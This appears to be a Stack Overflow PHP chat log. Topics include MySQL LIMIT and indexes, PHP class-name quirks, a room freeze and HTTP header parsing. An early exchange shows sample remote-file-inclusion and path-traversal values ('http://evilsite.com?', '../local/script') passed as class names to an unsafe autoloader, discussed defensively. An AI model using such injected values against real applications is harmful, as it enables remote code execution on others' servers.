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11:00
@Tredged Are you becoming help vampire? dev.mysql.com/doc/refman/5.0/en/…
@Gordon yes, it's a huge security risk, which could be avoided if PHP checked the validity of the class name before attempting to load it.
there will most likely be post-padding, so the .php will prevent some issues (I don't think you can put a null byte to string-terminate)
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But php manual explicitly gives regex that matches valid class names. So anybody can check validity of class name inside autoloader, imho.
if there's no pre-padding, you may be vulnerable to RFI. $class = 'http://evilsite.com?';.
Ugh, substr() sucks for casting null to 0 when passed as the third arg
and if there is pre-padding, which is likely, you might still get owned by LFI. $class = '../local/script';'
11:05
@dragon112 You're quite welcome
@DaveRandom Oh by the way my browser also crashed because of that page..
Hello, I have a question about the speed of a foreach loop I'm using, I was hoping someone with more knowledge than me could tell me the right way to do this...
> Don't ask whether someone is here to help you. If someone is around and wants to help they will.
@dragon112 ...and your browser is...?
@DaveRandom Chrome, up to date.
11:06
I have a variable, with 151 objects inside, I'm looping through until I get the first match I need, and then I use break; to end the loop.
@dragon112 I still blame Apple for webkit.
Fair enough haha :D
The value I need is like this $object->value = "I want this one".
:-P
(Not really)
I know you were kidding (even though you were kind of serious)
11:08
Heh, while trying to help someone rewrite index.php to "nothing" (empty) and I tried the following
RewriteRule ^index.php$ [L,R=301]
But according to the online tester it fails, so came up with a hack
RewriteRule ^index.php()$ $1 [L,R=301]
Is there a "cleaner" way ?
At the moment I'm looping 82 times until I reach what I want, but I don't know any faster way to access the values in the objects. Is looping this many times an issue..?
@DaveRandom Oh wait I just noticed Chrome 28 is released!
Now my Chrome is really up-to-date
@Dan depends on what you're doing. If you're computing primes up to 10million 82 times that would be quite slow :)
@Dan What you are doing is, at the fundamental level, searching a table for a record based on a specific column. So yes, there is a quicker way to do it, using an index. However unless you are searching the array multiple times (i.e. running multiple queries) in the same execution scope, chances are building the index would be more expensive than doing a full table scan.
(you'd have to do a full table scan to build the index(es))
indices?
whatever
^ yes that one
11:10
haha
Well, I did think about writing a MySQL query which gets the first match. Often there will be more than 1, but I only need the first.
Basically Dave is asking you this: how many times do you iterate though it in a single request?
Just the once.
@Dan then use LIMIT 1
Which returns 1 result, right?
@Dan Yeh just do a SELECT * FROM ... LIMIT 1
11:12
Does LIMIT stop as soon as it finds a match?
or SELECT TOP 1 if you use a crappy SQL engine
@Dan If you don't do ORDER BY then yes
@igorw how can that be exploited? I don't see it.
I just set my CURTIME-1500 means 15mins or SEC_TO_TIME with 15 mins but for some reason if 1 user is 7:05:00 and the other user is 6:59:00 the last users doesnt get fetched because its not at the 7 yes is that normal ?
@DaveRandom Didn't know this... : \
(i.e. it assumes natural ordering in the table)
11:13
@Dan You shouldn't worry too much about what SQL server is doing unless you are shooting queries with multiple sub-queries containing more sub-queries.
@dragon112 Yes, I don't want to over-think it. I just wondered if there was a faster way than looping through all these objects, either will different PHP or MySQL
@Dan But the thing is, if you index the target column in the DB it will still be way quicker to do it in SQL that it would be to pull all candidates into PHP, turn them into objects, put them in an array, and then manually implement a full table scan using the black magic of foreach.
^ Translation: MySQL is a boss and you should rely on it.
In this case at least
If you need to apply ordering then also make sure you have an index on the column you are basing the order on
Sadly I don't know too much about MySQL. I can do some basic queries.
11:15
morning yall
@DaveRandom The "index" you're talking about, I don't know much about this.
thinking to change my username to my real name
I tend to think about the "ID" column..?
@Dan That's what he means
11:16
@Dan That's a special type of index called the "primary key", but there are other types of indexes
So the primary key
I know a bit about the primary key, but that's it.
Other indexes = clueless.
@igorw do you mean
spl_autoload_register(function($c) {
    include $c;
});
$foo = './test.php';
new $foo();

// where test.php contain
<?php echo 'foo!';
@Dan The PK is all you need here
ok cool. I'm going to try writing a query now and see how it goes.
11:19
@Dan For starters, all you really need to know is a basic overview, which boils down to unique vs. non-unique indexes. The Primary Key (PK) is a unique index which is usually assigned by the database, and any sane setup uses auto-increment to assign it (so the first row inserted gets ID 1, the next 2, etc etc). You should never, ever manually alter the primary key after it has been assigned to the row.
Thanks for the advice, dragon112 and DaveRandom
Anytime :)
@DaveRandom Thankfully, even I know this one :D
@Dan Here looks like a reasonable place to start learning about indexes in the context of MySQL
I know there's a whole bunch of terminology in there that you won't understand (B-Trees, R-Trees, etc etc) but don't worry about it for now
@igorw that's why I use class maps. cannot happen then.
11:22
@salathe can't. That's not a valid class name
@salathe a valid class name respects /^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]+$/
@Gordon it can still happen if you got a fallback
@Ocramius a fallback to an insecure classloader
@Gordon heh
@Gordon fixing it at autoloader level should be trivial btw
@Gordon yes, but test.php could be anything. how about init_database.php? boom your db is gone.
@igorw like I said: use classmaps.
@Ocramius I wouldn't vote against such a feature. But calling this a great security flaw in PHP is somewhat exaggerated when it's clearly the developer's fault when he forgot to check
11:28
@Gordon for production I fully agree. having to re-build them during development can be a bit of a pain though.
@Gordon any marshaller/serializer could potentially cause this
@Gordon imo PHP should not even try to load something that is not a valid class name.
like we saw for things like the billion laughs thing yesterday
@igorw github.com/theseer/Autoload painless and hasslefree
@Ocramius insecure marshaller/serializer then. file a bug with their project
@igorw There is not such thing as an "invalid class name" in PHP...
11:30
@NikiC there is? O_o
This feels like deja vu
@Gordon do you have to run a command every time you add a new file?
@NikiC I just pasted the regex some lines before
I'm sure I already had this discussion with you guys a few times...
it's for identifiers in general
11:30
@igorw yes.
@Ocramius A class name in PHP (and method name and property name and variable name and xyz name) is just an arbitrary string
the regex you posted only specifies what you can use "literally" in the code
@NikiC that follows a particular pattern
I.e. you can't write $* as a variable directly, but "*" is a valid variable name (${"*"})
markdown lolfails
@Gordon then it's a bit of a pain during development. "why the fuck is my class not loading? did I mistype it? maybe the case? maybe my case-sensitive filesystem? maybe an invisible character? oh no! I forgot to re-dump the classmap!"
11:32
@NikiC it's no method/class name...
@NikiC somewhat related stackoverflow.com/questions/3417180/… /cc @Ocramius @igorw
@Ocramius It is. You can call $this->{'*'} for example and handle it via __call
@salathe don't
@Tredged can ask that here.
@Ocramius @Gordon I think I'm going to post a self-answered SO question on this
11:33
@NikiC if you can define (at runtime) a class name with an empty name, then fine
otherwise, anything not following that regex is not a valid class name
@Ocramius it is....
@igorw you can easily put a hook into your idea to generate the new classmap when you add a new file.
show us :D
anything is a valid class name
it's even documented... I picked that regex somewhere iirc
(php manual)
11:34
@Ocramius class_alias("NormalClassName", "*"); $className = "*"; new $className; => tada, you just created an * object!
Gordon goes off to rewrite ALL ZEH CLASSNAMES
Recently got flag for NFSMW lolzzzz
@Gordon yes, you could :)
@NikiC you're right. very cool :)
of course I'm right :P
well duh
11:37
@NikiC interesting :) Well, then I guess you're right
git pull origin live === git fetch origin/live && git merge origin/live, is there any sense to do git remote update origin before git pull origin live?
still not sure why the language would support that, though I must admit I exploit the engine quite a lot myself, so can't really know
@igorw also what is the likelihood of you exploiting yourself through this during development?
@Ocramius The question is more: Why should PHP bother to forbid it? :)
@Gordon quite low, which is my point really. just use something like PSR during dev, and put the classmap into production.
11:41
@igorw yes, agreed. but that also means, it doesnt need a fix in PHP :)
looks like the engine still tries to autoload *
and if it was defined before, it probably wouldn't
/me tries something else
@Gordon yep. I guess it's simply an attack vector that you need to be aware of, and watch out for when constructing class names from user input.
there ya go... seems like it actually creates separate class definitions
@NikiC do you think this would still be a valid use case? I mean... this kind-of created a class that is impossible to define somewhen at runtime, no?
hi guys
Gud Evng
How do I upload my websit to the root index file of the internet? Thanks :)
6
11:48
@AshneilRoy you need the keys first
$date = 'November';
echo date('m', strtotime($date));
@Ocramius which keys do I need?
none shall pass
@AshneilRoy Of the internet of course
@PeeHaa Lol
11:50
@PeeHaa I made an internet. Where do I find the keys for it?
6
It just keeps giving
When life gives you lemons, make fun of them!
@PeeHaa I'll do a bit more research. Thanks anyway :)
Obvious troll
after almost 2 years I think I'm going to build me a new frontpage for my site. This would involve designing stealing stuff shit so wish me luck
1 message moved to bin
11:52
Skid,
@Ahmad I'm still having troubles breathing anyway
can't... stop... laughing...
haha :D
@PeeHaa Good luck!
tnx!
12:01
@PeeHaa when you're done, tell me. I gotta do the same thing and I don't want to use advanced art techniques like @igorw does
@PeeHaa OMG YOUR WEBSITE IS BORKEN! File not found.
@Ocramius I'll ping you when the result is on github :)
I don't get what you mean there
@Ocramius It will probably be tightly coupled to postgres though because I'm kinda lazy ;)
@NikiC once you've run that snippet, it is (in theory) impossible to define *, no? It must have an existing definition first, no?
@PeeHaa I'm just interested in the frontend. Especially if you use the github API
12:03
@AshneilRoy are you serious ?
@Ocramius can.
@dragon112 Yeah it has been that way for waaaaaaay too long. I need some index for all my subdomains
@HamZa What do you mean?
@Ocramius The current site (which isn't online, but is up on github) already uses the github api to get projects and show commits
@AshneilRoy Exactly what I said
12:04
But it has been a while since I wrote that so kittens may die
@HamZa Serious about what?
@AshneilRoy blah ...
@HamZa -_-
@PeeHaa mainly looking into building it with angular only <_<
@Ocramius Still don't get it. You can't define anything anymore cause you caused a fatal error ... you need to swap the Foo definition and the * alias
12:05
@Ocramius cool
@PeeHaa Then make it! :p
@dragon112 I am :D
@PeeHaa Is it done yet?
hehe nope :)
12:06
Just started a fresh branch :P
@PeeHaa Is it done yet?
lolol
Now everyone has to ask him if it's done yet..
I blame salathe.
@dragon112 I blame me too.
@dragon112 Everybody does
12:08
Great, I was afraid that I was being unreasonable.
No not at all :)
@PeeHaa Is it done yet?
Sigh At 7K and I can't approve an edit until I wait 12h -_-
almost
WTF html has a main tag
nice
what main tag ?
How can we rename attachments in d mail before we actually sent the mail?
@Gordon "Gordon has frozen this room." óÒ
They sort of asked for it.
Of course they did, but I didn't quite expect it to actually happen ^^
@NikiC What room?
12:19
@PeeHaa C++
lulz. What happened?
Besides the usual?
:)
Come on, I need that, how do we rename the file before sending mail? is that the same way we upload images and rename them?
@NikiC Ah because of that article someone there posted?
@R.MartinhoFernandes Man, what are you doing here?
3
Q: Lounge C++ frozen by mod?

Tony The LionSeriously why is Lounge C++ being frozen by Mod Gordon? I mean really? Because we're not on-topic?

^-- and here it comes
12:24
^ lol
@NikiC forget the fatal for a sec. class_alias('Unexisting', '*'); $a = '*'; new $a;... Is there any way to have an instance of * given that Unexisting doesn't exist?
@Ocramius no
just like you can't have instances of "Unexisting" if "Unexisting" doesn't exist...
so it is indeed impossible to have a class autoloaded by such a name
@ShuklaSannidhya I need someone to bother when I get annoyed with the avalanches of template errors from my code.
@Ocramius really?
didn't your var_dump example show the contrary?
12:28
well, it would first have a different failure
which is why I was asking if that's even a valid approach
I mean... causing a warning willingly... I don't think that's how it's meant to work...
WTF my comment was censored!!! CENSORED I TELLS YA!
@ShuklaSannidhya You can rest easy though. The compiler gods are smiling on me today.
:P
> casperOne has unfrozen this room.
@NikiC I believe it checks the aliased one first, then the original.
@Ocramius I think the warning there is just PHP's way of telling you "What you do there makes absolutely no sense, but because this is PHP, I'll let your code run along"
12:34
Wow they are going at it in the meta post :o
@dragon112 yeah ...
He shouldn't have frozen that, really users are suffocating here cuz of over strict SO rules
@NikiC meh... not sure I like this way of "letting it go through"... sounds PHP-ish :P
@Ocramius Exactly, very PHP-ish
That's the general behavior. If something fails horribly, throw a warning and continue
2
blargh
12:37
@NikiC And if it fails only a little bit, throw a fatal error. :P
PHP stands to programming as Italy stands to legal system.
@salathe looool
@salathe yes, that too :D
@salathe but make it catchable - you never know
@grantbacon It's not just ugly; the fact that PHP doesn't have the concept of type-literals, and everything needs to be a string, makes it doubly shit, because it's always `\\`.
12:40
@rdlowrey The ABNF for LWS in 2616 is [CRLF] 1*( SP | HT ), which means that "\r\n \r\n " is actually two LWS blocks (i.e. it would collapse to a string of two spaces) but when you do this and forward the value on, it is now collapsible to a single SP. Thoughts on this? Error in the RFC? Also do you just handle anything that matches 1*( CR | LF | SP | HT ) as LWS?
@R.MartinhoFernandes Did you previously at some point, have a white gorilla for your avatar?
I vaguely recall something like:
Damn. Bah well.
He's making stuff up again. @Bracketworks just where is your head at?
I had Alice wielding the Vorpal Blade against the Jabberwock before, and then switched to Robby the Robot when people started calling me a robot.
12:45
@DaveRandom Win.
Nicely done sir, nicely done.
I'm on fire today
GET A HOSE!
The user upload an image, I convert it to PNG. in the image result, the white color "#ffffff" is transformed to a liter white "#FEFEFE"
an idea ?
12:46
Fuck damnit PHP why do you have to keep taking away my awesome names and reserve them as keywords!!! aaaragh!
@PeeHaa Which one this time?
@PeeHaa lol XD
how to turn ages 18+ programmers into a bunch of school girls: freeze their chat for 5 minutes :P
@PeeHaa list again?
@PeeHaa lol
12:47
@DaveRandom Yes and array
@CarrieKendall haha
@DaveRandom I always have that happen, and I never remember from the last time, so I'm equally pissed every fucking time it happens.
Really @NikiC fix it for us please
mäh
pretty please
12:48
Has there been an RFC for that at some point? Fixing reserved names, that is.
:)
@Bracketworks semi related stuff
I do think that for method names it should be legal to use keywords like that. It's not like there's any ambiguity in the context of a class definition
user895378
@DaveRandom I do it exactly as the spec says there -- if I'm manually regexing headers for parsing I do it in two stages because the vast majority of headers don't split LWS onto multiple lines and you can get away with matching headers on a "per-line" basis and then doing an if (strpos($header, "\n\x20") || strps($header, "\n\x09")) { preg_replace(...); } to maximize speed. If I'm not concerned about speed then I opt for a recursive descent parser that branches wherever it needs to.
@rdlowrey I'm str*()ing it after our micro-optimisation convo the other day
@CarrieKendall lol
12:49
My code is truly horrifying
jo @MaciejCzyżewski
    if (
                        ($valueBytes[$bytePos] & "\x60") === "\x00" || $valueBytes[$bytePos] === "\x7F" // CTLs
                     || ($valueBytes[$bytePos] & "\x80") === "\x80"                                     // >127
                     || $valueBytes[$bytePos] === "\x28" || $valueBytes[$bytePos] === "\x29" //  ( )
                     || $valueBytes[$bytePos] === "\x3C" || $valueBytes[$bytePos] === "\x3E" //  < >
                     || $valueBytes[$bytePos] === "\x40" || $valueBytes[$bytePos] === "\x2C" //  @ ,
Get a load of that little lovely
holy crap :)
user895378
@DaveRandom Are you still working on Accept-?* negotiation?
12:50
@rdlowrey Yes, I thought I'd expand it to account for Accept-* as well as just Accept
@PeeHaa try writing an interpreter in PHP...
And rewrite the Accept parser while I'm at it
morning
Lol Gordon frozen lounge<c++>
@rdlowrey I'm assuming you guys saw this lib?
@NullPoiиteя mornnig
@igorw What is that design? Is it something default githubs? Can I steal it?
12:53
@DaveRandom Uh... switch?
ow wait there is a theme link on there
@PeeHaa I'm pretty sure it is, yea
user895378
@igorw Thanks for the heads up, but I generally prefer to write my own tools when it comes to protocol adherence just because other people's are usually (1) too slow for my needs or (2) not totally correct. Also, you learn a ton when you implement specs yourself.
@igorw tnx. I think it has got most things that I need. stealing it like a pro
@Bracketworks // Note: This routine favours speed and efficiency over readability and DRY. Deal with it.
;-)
user895378
12:56
@DaveRandom The easiest thing I've found (takes a bit longer to write but it's easy to understand) is a byte-by-byte recursive descent parser. It's pretty slow to do it that way but most of the accept headers you receive will be the same. If you took @Bracketworks advice and memoized them you could probably have a very high success rate in terms of cache hits and it probably wouldn't be that slow in a real world scenario.
@igorw Not even slightly a full impl. Falls down a couple of n00b traps and the guy didn't seem to read the spec for any headers apart from Accept:
user895378
Also, instant performance assassination under load:
user895378
protected function parseAcceptHeader($acceptHeader)
{
    $acceptHeader = preg_replace('/\s+/', '', $acceptHeader);
    $acceptParts  = preg_split('/\s*(?:,*("[^"]+"),*|,*(\'[^\']+\'),*|,+)\s*/',

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